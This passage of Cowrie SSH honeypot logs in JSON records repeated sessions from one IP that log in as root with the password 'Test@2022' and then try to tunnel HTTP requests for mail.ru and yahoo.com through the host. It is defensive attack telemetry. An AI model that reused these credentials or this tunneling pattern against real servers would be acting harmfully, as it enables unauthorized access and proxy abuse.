512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:19.253947Z","src_ip":"77.83.207.83","session":"876f14b64b93"}
{"eventid":"cowrie.session.closed","duration":"16.3","message":"Connection lost after 16.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:19.463298Z","src_ip":"212.227.125.160","session":"8bc7a742e592"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:19.506213Z","src_ip":"77.83.207.83","session":"876f14b64b93"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":7032,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:7032","sensor":"my-vps","timestamp":"2025-08-31T03:47:19.557872Z","session":"876f14b64b93"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:19.608539Z","src_ip":"77.83.207.83","session":"876f14b64b93"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":32603,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:32603","sensor":"my-vps","timestamp":"2025-08-31T03:47:19.753029Z","session":"876f14b64b93"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:19.804199Z","src_ip":"77.83.207.83","session":"876f14b64b93"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":6268,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:6268","sensor":"my-vps","timestamp":"2025-08-31T03:47:19.948950Z","session":"876f14b64b93"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:19.999484Z","src_ip":"77.83.207.83","session":"876f14b64b93"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:20.051013Z","src_ip":"77.83.207.83","session":"876f14b64b93"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":60662,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b313f0b16be","protocol":"ssh","message":"New connection: 77.83.207.83:60662 (1.2.3.4:22) [session: 0b313f0b16be]","sensor":"my-vps","timestamp":"2025-08-31T03:47:20.100781Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:20.111326Z","src_ip":"77.83.207.83","session":"0b313f0b16be"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:20.151407Z","src_ip":"77.83.207.83","session":"0b313f0b16be"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:20.404723Z","src_ip":"77.83.207.83","session":"0b313f0b16be"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":13860,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:13860","sensor":"my-vps","timestamp":"2025-08-31T03:47:20.456339Z","session":"0b313f0b16be"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:20.507007Z","src_ip":"77.83.207.83","session":"0b313f0b16be"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":28966,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:28966","sensor":"my-vps","timestamp":"2025-08-31T03:47:20.649271Z","session":"0b313f0b16be"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:20.700094Z","src_ip":"77.83.207.83","session":"0b313f0b16be"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":4552,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:4552","sensor":"my-vps","timestamp":"2025-08-31T03:47:20.840814Z","session":"0b313f0b16be"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:20.891547Z","src_ip":"77.83.207.83","session":"0b313f0b16be"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:20.942990Z","src_ip":"77.83.207.83","session":"0b313f0b16be"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":60753,"dst_ip":"1.2.3.4","dst_port":22,"session":"aef7b5e36fe4","protocol":"ssh","message":"New connection: 77.83.207.83:60753 (1.2.3.4:22) [session: aef7b5e36fe4]","sensor":"my-vps","timestamp":"2025-08-31T03:47:20.991080Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:21.000463Z","src_ip":"77.83.207.83","session":"aef7b5e36fe4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:21.040932Z","src_ip":"77.83.207.83","session":"aef7b5e36fe4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:21.288645Z","src_ip":"77.83.207.83","session":"aef7b5e36fe4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":29161,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:29161","sensor":"my-vps","timestamp":"2025-08-31T03:47:21.339343Z","session":"aef7b5e36fe4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:21.389133Z","src_ip":"77.83.207.83","session":"aef7b5e36fe4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":9587,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:9587","sensor":"my-vps","timestamp":"2025-08-31T03:47:21.532099Z","session":"aef7b5e36fe4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:21.581786Z","src_ip":"77.83.207.83","session":"aef7b5e36fe4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":17251,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:17251","sensor":"my-vps","timestamp":"2025-08-31T03:47:21.724005Z","session":"aef7b5e36fe4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:21.773801Z","src_ip":"77.83.207.83","session":"aef7b5e36fe4"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:21.824104Z","src_ip":"77.83.207.83","session":"aef7b5e36fe4"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":60849,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b38adf6daaf","protocol":"ssh","message":"New connection: 77.83.207.83:60849 (1.2.3.4:22) [session: 2b38adf6daaf]","sensor":"my-vps","timestamp":"2025-08-31T03:47:21.872910Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:21.873822Z","src_ip":"77.83.207.83","session":"2b38adf6daaf"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:21.923437Z","src_ip":"77.83.207.83","session":"2b38adf6daaf"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:22.172987Z","src_ip":"77.83.207.83","session":"2b38adf6daaf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":15326,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:15326","sensor":"my-vps","timestamp":"2025-08-31T03:47:22.224557Z","session":"2b38adf6daaf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:22.274567Z","src_ip":"77.83.207.83","session":"2b38adf6daaf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":19508,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:19508","sensor":"my-vps","timestamp":"2025-08-31T03:47:22.416247Z","session":"2b38adf6daaf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:22.466071Z","src_ip":"77.83.207.83","session":"2b38adf6daaf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":26564,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:26564","sensor":"my-vps","timestamp":"2025-08-31T03:47:22.608567Z","session":"2b38adf6daaf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:22.658616Z","src_ip":"77.83.207.83","session":"2b38adf6daaf"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:22.709808Z","src_ip":"77.83.207.83","session":"2b38adf6daaf"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":60950,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b5774a46d26","protocol":"ssh","message":"New connection: 77.83.207.83:60950 (1.2.3.4:22) [session: 2b5774a46d26]","sensor":"my-vps","timestamp":"2025-08-31T03:47:22.759564Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:22.760243Z","src_ip":"77.83.207.83","session":"2b5774a46d26"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:22.810889Z","src_ip":"77.83.207.83","session":"2b5774a46d26"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:23.062058Z","src_ip":"77.83.207.83","session":"2b5774a46d26"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":25873,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:25873","sensor":"my-vps","timestamp":"2025-08-31T03:47:23.113160Z","session":"2b5774a46d26"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:23.163529Z","src_ip":"77.83.207.83","session":"2b5774a46d26"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":30870,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:30870","sensor":"my-vps","timestamp":"2025-08-31T03:47:23.308710Z","session":"2b5774a46d26"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:23.359169Z","src_ip":"77.83.207.83","session":"2b5774a46d26"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":4884,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:4884","sensor":"my-vps","timestamp":"2025-08-31T03:47:23.500771Z","session":"2b5774a46d26"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:23.551331Z","src_ip":"77.83.207.83","session":"2b5774a46d26"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:23.602772Z","src_ip":"77.83.207.83","session":"2b5774a46d26"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":61046,"dst_ip":"1.2.3.4","dst_port":22,"session":"620238ece9c7","protocol":"ssh","message":"New connection: 77.83.207.83:61046 (1.2.3.4:22) [session: 620238ece9c7]","sensor":"my-vps","timestamp":"2025-08-31T03:47:23.652257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:23.662094Z","src_ip":"77.83.207.83","session":"620238ece9c7"}
